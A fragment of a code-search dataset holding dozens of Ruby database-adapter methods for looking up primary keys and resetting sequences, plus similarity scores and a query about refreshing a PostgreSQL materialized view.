"def pk_and_sequence_for(table) #:nodoc:\n result = query(<<-end_sql, 'PK and serial sequence')[0]\n SELECT columns.column_name, columns.column_default \n FROM primary_keys \n LEFT JOIN columns \n USING(table_name, column_name)\n WHERE primary_keys.table_name = '#{table_name.gsub(/(^\"|\"$)/,'')}'\n end_sql\n \n if result.length == 0\n return nil\n elsif result[0][1].nil?\n return nil\n else\n default_value = result[0][1]\n seq_name = default_value.match(/\\(\\'(\\w+)\\'\\)/).to_a.last\n return [result[0][0], seq_name]\n end\n rescue\n nil\n end",
"def default_sequence_name(table, _column)\n \"#{table}_seq\"\n end",
"def default_sequence_name(table_name, pk = nil) #:nodoc:\n result = serial_sequence(table_name, pk || 'id')\n return nil unless result\n Utils.extract_schema_qualified_name(result).to_s\n rescue ActiveRecord::StatementInvalid\n Redshift::Name.new(nil, \"#{table_name}_#{pk || 'id'}_seq\").to_s\n end",
"def primary_key(table_name)\n pk_and_sequence_for(table_name)[0]\n rescue\n nil\n end",
"def primary_key(table)\n pk_and_sequence = pk_and_sequence_for(table)\n pk_and_sequence && pk_and_sequence.first\n end",
"def pk_and_sequence_for(table)\n # try looking for a seq with a dependency on the table's primary key :\n result = select(<<-end_sql, 'PK and Serial Sequence')[0]\n SELECT attr.attname, seq.relname\n FROM pg_class seq,\n pg_attribute attr,\n pg_depend dep,\n pg_constraint cons\n WHERE seq.oid = dep.objid\n AND seq.relkind = 'S'\n AND attr.attrelid = dep.refobjid\n AND attr.attnum = dep.refobjsubid\n AND attr.attrelid = cons.conrelid\n AND attr.attnum = cons.conkey[1]\n AND cons.contype = 'p'\n AND dep.refobjid = '#{quote_table_name(table)}'::regclass\n end_sql\n\n if result.nil? || result.empty?\n # if that fails, try parsing the primary key's default value :\n result = select(<<-end_sql, 'PK and Custom Sequence')[0]\n SELECT attr.attname,\n CASE\n WHEN pg_get_expr(def.adbin, def.adrelid) !~* 'nextval' THEN NULL\n WHEN split_part(pg_get_expr(def.adbin, def.adrelid), '''', 2) ~ '.' THEN\n substr(split_part(pg_get_expr(def.adbin, def.adrelid), '''', 2),\n strpos(split_part(pg_get_expr(def.adbin, def.adrelid), '''', 2), '.')+1)\n ELSE split_part(pg_get_expr(def.adbin, def.adrelid), '''', 2)\n END as relname\n FROM pg_class t\n JOIN pg_attribute attr ON (t.oid = attrelid)\n JOIN pg_attrdef def ON (adrelid = attrelid AND adnum = attnum)\n JOIN pg_constraint cons ON (conrelid = adrelid AND adnum = conkey[1])\n WHERE t.oid = '#{quote_table_name(table)}'::regclass\n AND cons.contype = 'p'\n AND pg_get_expr(def.adbin, def.adrelid) ~* 'nextval|uuid_generate'\n end_sql\n end\n\n [ result['attname'], result['relname'] ]\n rescue\n nil\n end",
"def reset_pk_sequence!(table, pk = nil, sequence = nil) #:nodoc:\n unless pk and sequence\n default_pk, default_sequence = pk_and_sequence_for(table)\n pk ||= default_pk\n sequence ||= default_sequence\n end\n if pk\n if sequence\n quoted_sequence = quote_column_name(sequence)\n\n select_value <<-end_sql, 'Reset sequence'\n SELECT setval('#{quoted_sequence}', (SELECT COALESCE(MAX(#{quote_column_name pk})+(SELECT increment_by FROM #{quoted_sequence}), (SELECT min_value FROM #{quoted_sequence})) FROM #{quote_table_name(table)}), false)\n end_sql\n else\n @logger.warn \"#{table} has primary key #{pk} with no default sequence\" if @logger\n end\n end\n end",
"def reset_pk_sequence!(table, pk = nil, sequence = nil) #:nodoc:\n unless pk and sequence\n default_pk, default_sequence = pk_and_sequence_for(table)\n pk ||= default_pk\n sequence ||= default_sequence\n end\n if pk\n if sequence\n quoted_sequence = quote_column_name(sequence)\n\n select_value <<-end_sql, 'Reset sequence'\n SELECT setval('#{quoted_sequence}', (SELECT COALESCE(MAX(#{quote_column_name pk})+(SELECT increment_by FROM #{quoted_sequence}), (SELECT min_value FROM #{quoted_sequence})) FROM #{quote_table_name(table)}), false)\n end_sql\n else\n @logger.warn \"#{table} has primary key #{pk} with no default sequence\" if @logger\n end\n end\n end",
"def primary_key(table_name)\n pk_and_sequence = pk_and_sequence_for(table_name)\n pk_and_sequence && pk_and_sequence.first\n end",
"def reset_pk_sequence!(table, pk = nil, sequence = nil) #:nodoc:\n unless pk && sequence\n default_pk, default_sequence = pk_and_sequence_for(table)\n\n pk ||= default_pk\n sequence ||= default_sequence\n end\n\n if @logger && pk && !sequence\n @logger.warn \"#{table} has primary key #{pk} with no default sequence.\"\n end\n\n if pk && sequence\n quoted_sequence = quote_table_name(sequence)\n max_pk = query_value(\"SELECT MAX(#{quote_column_name pk}) FROM #{quote_table_name(table)}\", \"SCHEMA\")\n if max_pk.nil?\n if postgresql_version >= 100000\n minvalue = query_value(\"SELECT seqmin FROM pg_sequence WHERE seqrelid = #{quote(quoted_sequence)}::regclass\", \"SCHEMA\")\n else\n minvalue = query_value(\"SELECT min_value FROM #{quoted_sequence}\", \"SCHEMA\")\n end\n end\n if max_pk\n # NOTE(joey): This is done to replace the call:\n #\n # SELECT setval(..., max_pk, false)\n #\n # with\n #\n # SELECT setval(..., max_pk-1)\n #\n # These two statements are semantically equivilant, but\n # setval(string, int, bool) is not supported by CockroachDB.\n #\n # FIXME(joey): This is incorrect if the sequence is not 1\n # incremented. We would need to pull out the custom increment value.\n max_pk - 1\n end\n query_value(\"SELECT setval(#{quote(quoted_sequence)}, #{max_pk ? max_pk : minvalue})\", \"SCHEMA\")\n end\n end",
"def reset_primary_key_sequence(table)\n return unless seq = primary_key_sequence(table)\n pk = SQL::Identifier.new(primary_key(table))\n db = self\n s, t = schema_and_table(table)\n table = Sequel.qualify(s, t) if s\n\n if server_version >= 100000\n seq_ds = metadata_dataset.from(:pg_sequence).where(:seqrelid=>regclass_oid(LiteralString.new(seq)))\n increment_by = :seqincrement\n min_value = :seqmin\n # :nocov:\n else\n seq_ds = metadata_dataset.from(LiteralString.new(seq))\n increment_by = :increment_by\n min_value = :min_value\n # :nocov:\n end\n\n get{setval(seq, db[table].select(coalesce(max(pk)+seq_ds.select(increment_by), seq_ds.select(min_value))), false)}\n end",
"def pk_and_sequence_for(table) #:nodoc:\n # First try looking for a sequence with a dependency on the\n # given table's primary key.\n result = select(<<-end_sql, 'PK and serial sequence')[0]\n SELECT attr.attname, seq.relname\n FROM pg_class seq,\n pg_attribute attr,\n pg_depend dep,\n pg_namespace name,\n pg_constraint cons\n WHERE seq.oid = dep.objid\n AND seq.relkind = 'S'\n AND attr.attrelid = dep.refobjid\n AND attr.attnum = dep.refobjsubid\n AND attr.attrelid = cons.conrelid\n AND attr.attnum = cons.conkey[1]\n AND cons.contype = 'p'\n AND dep.refobjid = '#{quote_table_name(table)}'::regclass\n end_sql\n\n if result.nil? or result.empty?\n # If that fails, try parsing the primary key's default value.\n # Support the 7.x and 8.0 nextval('foo'::text) as well as\n # the 8.1+ nextval('foo'::regclass).\n result = select(<<-end_sql, 'PK and custom sequence')[0]\n SELECT attr.attname,\n CASE\n WHEN split_part(def.adsrc, '''', 2) ~ '.' THEN\n substr(split_part(def.adsrc, '''', 2),\n strpos(split_part(def.adsrc, '''', 2), '.')+1)\n ELSE split_part(def.adsrc, '''', 2)\n END as relname\n FROM pg_class t\n JOIN pg_attribute attr ON (t.oid = attrelid)\n JOIN pg_attrdef def ON (adrelid = attrelid AND adnum = attnum)\n JOIN pg_constraint cons ON (conrelid = adrelid AND adnum = conkey[1])\n WHERE t.oid = '#{quote_table_name(table)}'::regclass\n AND cons.contype = 'p'\n AND def.adsrc ~* 'nextval'\n end_sql\n end\n\n [result[\"attname\"], result[\"relname\"]]\n rescue\n nil\n end",
"def reset_pk_sequence!(table_name, primary_key=nil, sequence_name=nil)\n primary_key, seq_schema, sequence_name = pk_and_sequence_for(table_name, true)\n if primary_key && !sequence_name\n @logger.warn \"#{table_name} has primary key #{primary_key} with no sequence\" if @logger\n end\n\n if primary_key && sequence_name\n seq_from_where = \"FROM information_schema.sequences \"+\n \"WHERE sequence_schema='#{quote_string(seq_schema)}' \"+\n \"AND sequence_name='#{quote_string(sequence_name)}'\"\n result = select_rows(\n \"SELECT COALESCE(MAX(#{quote_column_name(primary_key)} + (SELECT increment #{seq_from_where})), \"+\n \" (SELECT minimum_value #{seq_from_where})) \"+\n \"FROM #{quote_table_name(table_name)}\",\n SCHEMA_LOG_NAME\n )\n\n if result.length == 1\n # The COMMIT; BEGIN; can go away when 1) transactional DDL is available 2) There is a better restart/set function\n execute(\n \"COMMIT; \"+\n \"CALL sys.alter_seq_restart('#{quote_string(seq_schema)}', '#{quote_string(sequence_name)}', #{result[0][0]}); \"+\n \"BEGIN;\",\n SCHEMA_LOG_NAME\n )\n else\n @logger.warn \"Unable to determin max value for #{table_name}.#{primary_key}\" if @logger\n end\n end\n end",
"def reset_pk_sequence!(table, pk = nil, sequence = nil)\n if ! pk || ! sequence\n default_pk, default_sequence = pk_and_sequence_for(table)\n pk ||= default_pk; sequence ||= default_sequence\n end\n if pk && sequence\n quoted_sequence = quote_column_name(sequence)\n\n select_value <<-end_sql, 'Reset Sequence'\n SELECT setval('#{quoted_sequence}', (SELECT COALESCE(MAX(#{quote_column_name pk})+(SELECT increment_by FROM #{quoted_sequence}), (SELECT min_value FROM #{quoted_sequence})) FROM #{quote_table_name(table)}), false)\n end_sql\n end\n end",
"def primary_key(table_name)\n 'id' # table.primary_key || 'id'\n end",
"def pk_and_sequence_for(table_name)\n (owner, table_name) = @connection.describe(table_name)\n\n # RSI: changed select from all_constraints to user_constraints - much faster in large data dictionaries\n pks = select_values(<<-SQL, 'Primary Key')\n select cc.column_name\n from user_constraints c, user_cons_columns cc\n where c.owner = '#{owner}'\n and c.table_name = '#{table_name}'\n and c.constraint_type = 'P'\n and cc.owner = c.owner\n and cc.constraint_name = c.constraint_name\n SQL\n\n # only support single column keys\n pks.size == 1 ? [oracle_downcase(pks.first), nil] : nil\n end",
"def primary_key(table_name)\n pk = super\n\n if pk == CockroachDBAdapter::DEFAULT_PRIMARY_KEY\n nil\n else\n pk\n end\n end",
"def default_sequence_name(table, column)\n @logger.unknown(\"ODBCAdapter#default_sequence_name>\") if @trace\n @logger.unknown(\"args=[#{table}|#{column}]\") if @trace\n get_autounique_column(table)\n end",
"def last_insert_id(table, sequence_name) #:nodoc:\n Integer(select_value(\"SELECT currval('#{sequence_name}')\"))\n end",
"def pk_and_sequence_for(table_name, with_seq_schema = false)\n result = select_rows(\n \"SELECT kc.column_name, \"+\n (with_seq_schema ? \"c.sequence_schema, \" : \"\") +\n \" c.sequence_name \"+\n \"FROM information_schema.table_constraints tc \"+\n \"INNER JOIN information_schema.key_column_usage kc \"+\n \" ON tc.table_schema = kc.table_schema \"+\n \" AND tc.table_name = kc.table_name \"+\n \" AND tc.constraint_name = kc.constraint_name \"+\n \"LEFT JOIN information_schema.columns c \"+\n \" ON kc.table_schema = c.table_schema \"+\n \" AND kc.table_name = c.table_name \"+\n \" AND kc.column_name = c.column_name \"+\n \"WHERE tc.table_schema = CURRENT_SCHEMA \"+\n \" AND tc.table_name = '#{table_name}' \"+\n \" AND tc.constraint_type = 'PRIMARY KEY'\",\n SCHEMA_LOG_NAME\n )\n (result.length == 1) ? result[0] : nil\n rescue\n nil\n end",
"def primary_key table\n return nil unless table\n table = self[table]\n pk = table.column_names.find{ |c| table[c].primary_key? }\n end",
"def default_primary_key\n model_name.foreign_key.to_s\n end",
"def autoincrementing_primary_key\n primary_key\n end",
"def autoincrementing_primary_key\n primary_key\n end",
"def last_insert_id(table, sequence_name) #:nodoc:\n identity = select_value(\"SELECT scope_identity()\")\n if identity.class == System::DBNull\n nil\n else\n System::Convert.to_int32(identity)\n end\n end",
"def reset_sequence!(table, column, sequence = nil)\n max_id = select_value(\"select max(#{column}) from #{table}\")\n execute(\"alter sequence #{default_sequence_name(table, column)} restart with #{max_id}\") unless legacy_mode\n execute(\"SET GENERATOR #{default_sequence_name(table, column)} TO #{max_id}\") if legacy_mode\n end",
"def getNextSequence(table,db)\n\t\tif db[table].count == 0\n\t\t\treturn 1\n\t\telse\n\t\t\tdb[table].find().sort(_id: -1).limit(1).each do |document|\n\t\t\t\treturn document[:_id]+1\n\t\t\tend\n\t\tend\n\tend",
"def set_sequence(table_name, pk)\n begin\n stmt = @connection.run(\"select max(#{pk}) + 1 from #{table_name}\")\n next_pk_val = stmt.fetch\n stmt.drop\n flds = table_name.split('.')\n @connection.do(\"sequence_set('#{flds[0]}.#{flds[1]}.#{table_name}.#{pk}', #{next_pk_val}, 0)\")\n return true\n rescue Exception => e\n @logger.unknown(\"exception=#{e}\") if @trace\n end\n return false\n end",
"def uses_sequence\n select_value(\"SELECT name FROM sqlite_master WHERE type='table' AND name='sqlite_sequence';\")\n end",
"def primary_key\n \"#{quoted_table_name}.#{model_class.send :primary_key}\"\n end",
"def primary_key\n \"#{quoted_table_name}.#{model_class.send :primary_key}\"\n end",
"def primary_key(table_name)\n # TODO: Change this to be a pure mongo lookup by digging into document definitions\n # TODO: Manage _id and id\n id_definition = Mongo::DocumentDefinition.fields_for(table_name).find { |_, field_definition| field_definition['primary_key'] }\n Array(id_definition).first # && id_definition.first || '_id'\n end",
"def primary_key\n @primary_key ||= :id\n end",
"def primary_key_name\n @primary_key_name ||= @connection.schema[@table_name.to_s][:primary_key]\n end",
"def primary_key\n @primary_key || 'id'\n end",
"def find_primary_key_by_table(table_name)\n @opts[:primary_key].values_at(table_name).first\n end",
"def reset_sequence!(table, column, sequence = nil)\n sequence ||= default_sequence_name(table, column)\n max_id = select_value(\"select max(#{column}) from #{table}\")\n execute(\"alter sequence #{sequence} restart with #{max_id}\")\n end",
"def primary_key(_table_name)\n []\n end",
"def primary_key(table)\n t = dataset.send(:input_identifier, table)\n @primary_keys.fetch(t) do\n pk = fetch(\"SELECT RDB$FIELD_NAME FROM RDB$INDEX_SEGMENTS NATURAL JOIN RDB$RELATION_CONSTRAINTS WHERE RDB$CONSTRAINT_TYPE = 'PRIMARY KEY' AND RDB$RELATION_NAME = ?\", t).single_value\n @primary_keys[t] = dataset.send(:output_identifier, pk.rstrip) if pk\n end\n end",
"def pkey\n table = self.class.table_name\n key = get_primary_key_values.first\n return key\n end",
"def next_sequence_value(sequence_name)\n select_one(\"select #{sequence_name}.nextval id from dual\")['id']\n end",
"def key\n get_primary_key_value_map[self.class.table_name]\n end",
"def primary_key(table_name) #:nodoc:\r\n sql = \"SELECT COLUMN_NAME FROM (EXECUTE PROCEDURE sp_GetBestRowIdentifier( NULL, NULL, '#{table_name}', NULL, FALSE)) as gbri\"\r\n rs = select(sql)\r\n if !rs.nil? and !rs[0].nil?\r\n strip_or_self(rs[0]['COLUMN_NAME'])\r\n else\r\n nil\r\n end\r\n end",
"def primary_key(value=nil)\n self.primary_key = value unless value.nil?\n \n @primary_key ||= :id\n end",
"def next_sequence_value(sequence_name)\n # if sequence_name is set to :autogenerated then it means that primary key will be populated by trigger\n raise ArgumentError.new \"Trigger based primary key is not supported\" if sequence_name == AUTOGENERATED_SEQUENCE_NAME\n # call directly connection method to avoid prepared statement which causes fetching of next sequence value twice\n select_value(<<~SQL.squish, \"SCHEMA\")\n SELECT #{quote_table_name(sequence_name)}.NEXTVAL FROM dual\n SQL\n end",
"def reset_sequence!(table, column, sequence = nil)\n # Do nothing by default. Implement for PostgreSQL, Oracle, ...\n end",
"def reset_sequence_numbers\n result = Database.connection.exec(\"SELECT table_name FROM information_schema.tables WHERE table_schema = 'public';\")\n table_names = result.map { |row| row.values_at('table_name')[0] }\n\n table_names_with_id_column = table_names.select do |table_name|\n result = Database.connection.exec(\"SELECT column_name FROM information_schema.columns WHERE table_name = '#{table_name}';\")\n column_names = result.map { |row| row.values_at('column_name')[0] }\n column_names.include?('id')\n end\n\n table_names_with_id_column.each do |table_name|\n result = Database.connection.exec(\"SELECT pg_get_serial_sequence('#{table_name}', 'id');\")\n sequence_name = result.getvalue(0, 0)\n Database.connection.exec(\"SELECT setval('#{sequence_name}', (select MAX(id) from #{table_name}));\")\n end\n end",
"def generate_primary_key\n self[self.class.primary_key] ||= self.class.new_primary_key(10_000)\n end",
"def reset_id_seq *tables\n tables.each do |table|\n sql \"SELECT setval('#{table}_id_seq',max(id)) FROM #{table}\"\n end\n end",
"def primary_key(table, opts=OPTS)\n quoted_table = quote_schema_table(table)\n Sequel.synchronize{return @primary_keys[quoted_table] if @primary_keys.has_key?(quoted_table)}\n value = _select_pk_ds.where_single_value(Sequel[:pg_class][:oid] => regclass_oid(table, opts))\n Sequel.synchronize{@primary_keys[quoted_table] = value}\n end",
"def sequence_values(rep_prefix, table_name)\n # check if the table has an auto_increment column, return if not\n sequence_row = select_one(<<-end_sql)\n show columns from `#{table_name}` where extra = 'auto_increment'\n end_sql\n return {} unless sequence_row\n column_name = sequence_row['Field']\n\n # check if the sequences table exists, create if necessary\n sequence_table_name = \"#{rep_prefix}_sequences\"\n unless tables.include?(sequence_table_name)\n create_table \"#{sequence_table_name}\".to_sym,\n :id => false, :options => 'ENGINE=MyISAM' do |t|\n t.column :name, :string\n t.column :current_value, :integer\n t.column :increment, :integer\n t.column :offset, :integer\n end\n ActiveRecord::Base.connection.execute(<<-end_sql) rescue nil\n ALTER TABLE \"#{sequence_table_name}\"\n ADD CONSTRAINT #{sequence_table_name}_pkey\n PRIMARY KEY (name)\n end_sql\n end\n\n sequence_row = select_one(\"select current_value, increment, offset from #{sequence_table_name} where name = '#{table_name}'\")\n if sequence_row == nil\n current_max = select_one(<<-end_sql)['current_max'].to_i\n select max(`#{column_name}`) as current_max from `#{table_name}`\n end_sql\n return {column_name => {\n :increment => 1,\n :value => current_max\n }\n }\n else\n return {column_name => {\n :increment => sequence_row['increment'].to_i,\n :value => sequence_row['offset'].to_i\n }\n }\n end\n end",
"def pk_and_sequence_for(table_name, owner = nil, desc_table_name = nil) # :nodoc:\n (owner, desc_table_name) = @raw_connection.describe(table_name)\n\n seqs = select_values_forcing_binds(<<~SQL.squish, \"SCHEMA\", [bind_string(\"owner\", owner), bind_string(\"sequence_name\", default_sequence_name(desc_table_name))])\n select us.sequence_name\n from all_sequences us\n where us.sequence_owner = :owner\n and us.sequence_name = upper(:sequence_name)\n SQL\n\n # changed back from user_constraints to all_constraints for consistency\n pks = select_values_forcing_binds(<<~SQL.squish, \"SCHEMA\", [bind_string(\"owner\", owner), bind_string(\"table_name\", desc_table_name)])\n SELECT cc.column_name\n FROM all_constraints c, all_cons_columns cc\n WHERE c.owner = :owner\n AND c.table_name = :table_name\n AND c.constraint_type = 'P'\n AND cc.owner = c.owner\n AND cc.constraint_name = c.constraint_name\n SQL\n\n warn <<~WARNING if pks.count > 1\n WARNING: Active Record does not support composite primary key.\n\n #{table_name} has composite primary key. Composite primary key is ignored.\n WARNING\n\n # only support single column keys\n pks.size == 1 ? [oracle_downcase(pks.first),\n oracle_downcase(seqs.first)] : nil\n end",
"def reset_sequence!(table, column, sequence = nil)\n mpk = select_value(\"SELECT MAX(#{quote_column_name(column)}) FROM #{quote_table_name(table)}\")\n execute(\"ALTER TABLE #{quote_table_name(table)} ALTER COLUMN #{quote_column_name(column)} RESTART WITH #{mpk.to_i + 1}\")\n end",
"def property_schema_statement(schema)\n statement = super\n\n if schema.has_key?(:sequence_name)\n statement << \" DEFAULT nextval('#{schema[:sequence_name]}') NOT NULL\"\n end\n\n statement\n end",
"def next_sequence_id\n last_sequence_id + 1\n end",
"def primary_key\n self.class.primary_key\n end",
"def primary_key\n self.class.primary_key\n end",
"def primary_key\n self.class.primary_key\n end",
"def association_primary_key(klass = nil)\n active_record.primary_key\n end",
"def primary_key\n @primary_key ||= @klass.primary_key.to_s\n end",
"def primary_key(table_name, opts=OPTS)\n quoted_table = quote_schema_table(table_name)\n Sequel.synchronize{return @primary_keys[quoted_table] if @primary_keys.has_key?(quoted_table)}\n out_identifier, in_identifier = identifier_convertors(opts)\n schema, table = schema_or_current_and_table(table_name, opts)\n dataset = metadata_dataset.\n select(:kc__column_name).\n from(Sequel.as(:information_schema__key_column_usage, 'kc')).\n join(Sequel.as(:information_schema__table_constraints, 'tc'),\n [:table_name, :table_schema, :constraint_name]).\n where(:kc__table_name => in_identifier.call(table),\n :kc__table_schema => schema,\n :tc__constraint_type => 'PRIMARY KEY')\n value = dataset.map do |row|\n out_identifier.call(row.delete(:column_name))\n end\n value = case value.size\n when 0 then nil\n when 1 then value.first\n else value\n end\n Sequel.synchronize{@primary_keys[quoted_table] = value}\n end",
"def next_for(table)\n table = table.respond_to?(:table_name) ? table.table_name : table.to_s\n next_id :table => table\n end",
"def table_id\n\n end",
"def pkey_selection(table = nil)\n prefix = table ? \"#{table}.\" : \"\"\n \"#{primary_key.map { |k| \"#{prefix}`#{k}` AS '#{k}'\" }.join(', ')}\"\n end",
"def last_insert_id(sequence_name)\n r = exec_query(\"SELECT currval('#{sequence_name}')\", 'SQL')\n Integer(r.rows.first.first)\n end",
"def full_primary_key(klass)\n \"#{klass.quoted_table_name}.#{klass.quoted_primary_key}\"\n end",
"def default\n by_id(default_id)\n end",
"def primary_key(table_name)\n table_name = table_name.to_s\n\n @primary_keys ||= {}\n @primary_keys[table_name] ||= if @registration[:primary_key].present?\n @registration[:primary_key].call(@connection, table_name)\n else\n @connection.primary_key(table_name)\n end\n end",
"def primary_key\n @primary_key\n end",
"def table\n Identity\n end",
"def table\n Identity\n end",
"def primary_key_to_uuid(table, options = {})\n default = options[:default] || 'gen_random_uuid()'\n seed = options[:seed]\n\n column = connection.primary_key(table)\n\n execute %Q{ALTER TABLE #{table}\n ALTER COLUMN #{column} DROP DEFAULT,\n ALTER COLUMN #{column} SET DATA TYPE UUID USING (#{to_uuid_pg(column, seed)}),\n ALTER COLUMN #{column} SET DEFAULT #{default}}\n\n execute %Q{DROP SEQUENCE IF EXISTS #{table}_#{column}_seq} rescue nil\n end",
"def test_reset_empty_table_with_custom_pk_sequence\n @connection.exec_query(\"CREATE SEQUENCE widgets_seq\")\n @connection.exec_query(\"\n CREATE TABLE widgets (\n widgetid INT PRIMARY KEY DEFAULT nextval('widgets_seq'),\n name string\n )\n \")\n assert_equal 1, Widget.create(name: \"weather\").id\n end",
"def test_reset_empty_table_with_custom_pk_sequence\n @connection.exec_query(\"CREATE SEQUENCE widgets_seq\")\n @connection.exec_query(\"\n CREATE TABLE widgets (\n widgetid INT PRIMARY KEY DEFAULT nextval('widgets_seq'),\n name string\n )\n \")\n assert_equal 1, Widget.create(name: \"weather\").id\n end",
"def reset_sequence_value(name, next_value = nil)\n create_sequence(name)\n unless next_value\n table, field = name.split('_$_')\n next_value = self.select_rows('SELECT MAX(%s) as max FROM %s' % [field, table]).first.first.to_i + 1\n end\n self.execute(\"ALTER TABLE %s_sequence AUTO_INCREMENT = %s\" % [name, next_value || 1])\n end",
"def primary_key\n 'id'\n end",
"def sequence_id\n object.sequence._id.to_s\n end",
"def column_default(key)\n self.class.column_default(key)\n end",
"def default_key\n :\"#{self[:name]}_id\"\n end",
"def find_primary_key(table)\n query = %q{\n SELECT column_name\n FROM information_schema.table_constraints tc\n INNER JOIN\n information_schema.key_column_usage kcu\n ON tc.constraint_name = kcu.constraint_name\n WHERE constraint_type = 'PRIMARY KEY'\n AND tc.table_catalog = 'reaktor'\n AND tc.table_schema = 'public'\n AND tc.table_name = ?\n ORDER BY ordinal_position;\n }\n\n sth = $dbh_pg.prepare(query)\n begin\n sth.execute(table.to_s)\n rescue\n $stderr.puts \"### Error in #{__FILE__} on line #{__LINE__}. See errorlog\"\n Log.write_log('error', \"Could not find primary key. Message: #{$!}. query: #{get_query_string(sth)}\")\n raise\n exit\n end\n pk = []\n while row = sth.fetch\n pk << row[0]\n end\n return pk\nend",
"def default_key\n :\"#{self[:name]}_id\"\n end",
"def simple_id\n \"_#{@table.id}_#{@id}\"\n end",
"def primary_key\n case primary_key_prefix_type\n when :table_name\n Inflector.foreign_key(class_name_of_active_record_descendant(self), false)\n when :table_name_with_underscore\n Inflector.foreign_key(class_name_of_active_record_descendant(self))\n else\n \"id\"\n end\n end",
"def get_id\n default_id = self.class.to_s.split('::').last\n default_id[0] = default_id[0].downcase\n return default_id\n end",
"def next_val_sequence(name)\n if self.class.to_s =~ /ActiveRecord::ConnectionAdapters::Mysql/\n self.insert_sql(\"INSERT INTO %s_sequence VALUES(NULL)\" % name)\n else\n # the default insert_sql is nonsense, but jdbc_mysql doesn't override it\n self.execute(\"INSERT INTO %s_sequence VALUES(NULL)\" % name)\n end\n end",
"def identifier_value\n DEFAULT_QUESTIONNAIRE_ID\n end",
"def primary_key(table_name)\n stmt = @connection.primary_keys(native_case(table_name.to_s))\n result = stmt.fetch_all || []\n stmt.drop unless stmt.nil?\n result[0] && result[0][3]\n end",
"def default_sid\n oratab = OraUtils::OraTab.new\n oratab.default_sid\n rescue\n ''\n end",
"def primary_key\n return @primary_key if @primary_key\n @primary_key = dimension_table.to_s.camelize.constantize.primary_key.to_sym\n rescue NameError => e\n ETL::Engine.logger.debug \"couldn't get primary_key from dimension model class, using default :id\"\n @primary_key = :id\n end",
"def default_key\n :\"#{self[:model].name.to_s.demodulize.underscore}_id\"\n end",
"def default_key\n :\"#{underscore(demodulize(self[:model].name))}_id\"\n end",
"def to_param\n sequence_no\n end",
"def next_sequence_value(sequence_name)\n @connection.query(\"SELECT NEXT VALUE FOR #{sequence_name} FROM RDB$DATABASE\")[0][0]\n end",
"def primary_key\n self[:primary_key] ||= associated_class.primary_key\n end",
"def primary_key\n self[:primary_key] ||= self[:model].primary_key\n end",
"def primary_key\n select(&:primary_key?)\n end"
] |
[
"0.8170994",
"0.81505257",
"0.8027529",
"0.7910902",
"0.78652835",
"0.78608876",
"0.78294235",
"0.74895513",
"0.7457443",
"0.7406263",
"0.7299918",
"0.7291324",
"0.72609276",
"0.72075987",
"0.7121409",
"0.70861423",
"0.7080454",
"0.69758296",
"0.6911338",
"0.680072",
"0.6795771",
"0.66242427",
"0.65517443",
"0.6522507",
"0.6471901",
"0.64188516",
"0.6371983",
"0.6371983",
"0.6355501",
"0.62790275",
"0.6204521",
"0.6160675",
"0.6066816",
"0.6061855",
"0.6061855",
"0.6057503",
"0.6039172",
"0.6031963",
"0.60282445",
"0.60242283",
"0.60086197",
"0.59984404",
"0.59958756",
"0.5961279",
"0.5947062",
"0.59455574",
"0.592126",
"0.58974195",
"0.58891547",
"0.58805203",
"0.58618593",
"0.58521354",
"0.5848536",
"0.5843924",
"0.58196473",
"0.5818348",
"0.5812072",
"0.5762068",
"0.57471704",
"0.5741498",
"0.5741498",
"0.5741498",
"0.5733901",
"0.5716411",
"0.57007575",
"0.5638035",
"0.5616776",
"0.56089485",
"0.56068057",
"0.5601467",
"0.55973285",
"0.5577493",
"0.5575126",
"0.55641216",
"0.55641216",
"0.5559974",
"0.55498004",
"0.55498004",
"0.5547278",
"0.55378187",
"0.55370325",
"0.5518114",
"0.5507541",
"0.54624885",
"0.54524535",
"0.5450779",
"0.54501575",
"0.5443172",
"0.54430574",
"0.5440272",
"0.5419304",
"0.5418631",
"0.5408548",
"0.5406169",
"0.54008734",
"0.5378645",
"0.5375252",
"0.53748524",
"0.5373012",
"0.53669703"
] |
0.7384305
|
10
|
Refresh the materialized view with the given name.

  DB.refresh_view(:items_view)
  # REFRESH MATERIALIZED VIEW items_view

  DB.refresh_view(:items_view, concurrently: true)
  # REFRESH MATERIALIZED VIEW CONCURRENTLY items_view
|
def refresh_view(name, opts=OPTS)
run "REFRESH MATERIALIZED VIEW#{' CONCURRENTLY' if opts[:concurrently]} #{quote_schema_table(name)}"
end
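
A minimal usage sketch (not part of the adapter itself): it assumes a PostgreSQL-backed Sequel::Database bound to DB and a hypothetical :items_view materialized view; the concurrent variant additionally requires a unique index on the view.

# Sketch under the assumptions above: refresh a materialized view after
# bulk-loading its source table.
require 'sequel'

DB = Sequel.connect('postgres://localhost/mydb')
DB[:items].multi_insert([{name: 'a'}, {name: 'b'}])

# A plain refresh blocks reads on the view while it rebuilds.
DB.refresh_view(:items_view)

# A concurrent refresh allows reads during the rebuild, but needs a
# unique index on the view and cannot run inside a transaction.
DB.refresh_view(:items_view, concurrently: true)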
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def refresh_materialized_view(name, options = {})\n options = {\n :with_data => true\n }.merge(options)\n\n sql = \"REFRESH MATERIALIZED VIEW #{quote_view_name(name)}\"\n sql << \" WITH NO DATA\" unless options[:with_data]\n\n execute \"#{sql};\"\n end",
"def refresh_view(view_name, options = {})\n SchemaMonkey::Middleware::Migration::RefreshView.start(connection: self, view_name: view_name, options: options) do |env|\n view_name = env.view_name\n sql = \"REFRESH MATERIALIZED VIEW #{quote_table_name(view_name)}\"\n execute sql\n end\n end",
"def refresh_views\n database.views.each do |name, view|\n materialize(view)\n end\n end",
"def refresh_later(options = {})\n MaterializedViewRefreshWorker.perform_async(name, options)\n end",
"def refresh\r\n @view.refresh\r\n end",
"def refresh\n Vedeu.trigger(:_refresh_view_, current)\n\n Vedeu.trigger(:_refresh_cursor_, current)\n end",
"def materialize_view(name, sql)\n unless @enduser\n raise Empire::MissingEnduserError.new\n end\n path = \"view/#{name}\"\n data = {'query' => sql}\n request path, :put, {}, data\n end",
"def by_name\n Vedeu.log(type: :cursor,\n message: \"Refreshing cursor: (#{cursor.inspect})\")\n\n render\n\n Vedeu.trigger(:_refresh_view_content_, name) if refresh_view?\n end",
"def materialize(view)\n logger.info \"Materializing the view '#{view.name}'\" if logger\n view.materialize(database.document_store) if view.materialized?\n logger.info \"The view '#{view.name}' is now materialized\" if logger\n end",
"def each_materialized_view(&block)\n if block_given?\n @materialized_views.each(&block)\n self\n else\n @materialized_views.freeze\n end\n end",
